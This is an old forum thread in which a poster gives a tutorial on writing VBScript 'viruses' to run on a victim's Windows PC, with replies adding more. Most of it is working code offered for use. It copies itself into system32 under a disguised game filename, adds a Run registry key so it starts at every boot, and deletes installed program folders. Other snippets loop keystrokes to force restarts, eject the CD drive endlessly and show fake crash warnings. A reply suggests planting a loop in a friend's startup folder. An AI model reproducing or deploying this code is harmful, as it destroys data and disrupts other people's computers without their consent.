Posted August 30, 200717 yr Items you need -> Notepad-> You and your victim is running Windows 1. Open notepad2. On the first line addwshshell.run "calc" wscript.sleep 100 wshshell.sendkeys "5" wscript.sleep 1000 wshshell.run "calc" wscript.sleep 100 wshshell.sendkeys "4" wscript.sleep 1000 wshshell.run "calc" wscript.sleep 100 wshshell.sendkeys "3" wscript.sleep 1000 wshshell.run "calc" wscript.sleep 100 wshshell.sendkeys "2" wscript.sleep 1000 wshshell.run "calc" wscript.sleep 100 wshshell.sendkeys "1" wscript.sleep 1000 wshshell.run "calc" wscript.sleep 100 wshshell.sendkeys "0" - This would make the calculater pop up, counting down from 5 to 0 with 1 second of space between each calculater pops up.Set wshshell = WScript.CreateObject("Scripting.FileSystemObject")Wshshell.CopyFile WScript.ScriptFullName, "C:\PATH OF YOUR CHOICE\FILENAME.vbs"PATH OF YOUR CHOICE indicates where you want to copy your script to. FILENAME indicates the name of your VBS script. Example:C:\WINDOWS\system32\SuperNewTankGame.vbsThis command will copy your script to C/Windows/System32Wshshell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\filename","C:\PATH OF YOUR CHOICE\FILENAME.vbs"You need you use this command with the copy command in order to work...NOW, THIS IS EVIL !This command will add your script to the startup program list, so every time your victim starts his computer, the script will run itself.Please, remember to add Set wshShell = wscript.CreateObject("WScript.Shell")after using COPY or REGWRITE command Set wshshell = wscript.CreateObject("WScript.Shell")Wshshell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shutup.exe","C:\Virus.vbs" Set wshshell = WScript.CreateObject("Scripting.FileSystemObject")Wshshell.CopyFile WScript.ScriptFullName, "C:\Virus.vbs"Set wshshell = wscript.CreateObject("WScript.Shell")Delete Folder CodeDim FSO, Folderset FSO=CreateObject("Scripting.FileSystemObject")Folder="C:\PATCH OF FOLDER OR/ AND FOLDERNAME"FSO.DeleteFolder(Folder)ExampleDim FSO, Folderset FSO=CreateObject("Scripting.FileSystemObject")Folder="C:\Program Files\MSN Messenger"FSO.DeleteFolder(Folder)This will restart your victims PC :lol:doWshShell.SendKeys "%{F4}"Wscript.sleep 100wshshell.sendkeys "r"loopCD EJECT [should be done without a cd/dvd in the drive, for faster ejecting]Set oWMP = CreateObject("WMPlayer.OCX.7" )Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNext ' cdromEnd Ifloopwshshell.AppActivate "cmd"'AppActivate activates the window which has a title equal to, or closest to what you type in the quotes'You need the sleep to make sure that it activates it after cmd has started wshshell.run "cmd",2,2 means that the program will start minimized !Another code:MsgBox"TEXT YOU WANT TO DISPLAY",EXTRA CODES, "TITLE"This will launch a pop up where the title will be "TITLE", and the message will be "TEXT YOU WANT TO DISPLAY"For an example:MsgBox"Hello, this is not a JOKE, your pc will CRASH!", 0 + 16 + 4096, "Critical"Extra stuff that you can add in the ,EXTRA CODES, area:Buttons :0 - OK1 - OK, CANCEL2 - ABORT, RETRY, IGNORE3 - YES, NO, CANCEL4 - YES, NO5 - RETRY, CANCELICONS :16 - CRITICAL ICON32 - WARNING QUERY ICON48 - WARNING MESSAGE ICON64 - INFO ICONExtra Stuff:0 - NORMAL4096 - ALWAYS ON TOP,1+16+4096, Will make a window with OK and CANCEL buttons, CRITICAL ICON, and the window will be on top of other windowsIf you want to make a command that repeats itself:do COMMAND(S) loopWhere COMMAND is one of the command i listed aboveEeeenjoy !And please, if somebody can make some kind of "program" to convert .vbs to .exe, ot just an exe that runs the vbs, WOULD BE AWESOME! Edited August 30, 200717 yr by Mr.Thunderbird
September 3, 200717 yr Author Thanks all Glad you could use it Oh, and be free to use post this tut on other forums, but it would be better if you linked to this page, because there might come some updates Edited September 3, 200717 yr by Mr.Thunderbird
July 9, 200915 yr try this script Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"wshshell.sendkeys "{NUMLOCK}"wshshell.sendkeys "{SCROLLLOCK}"looprun this and look on lights on your keyboardput this on ur fren'z start up folder for more fun Edited July 9, 200915 yr by pri2sh
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.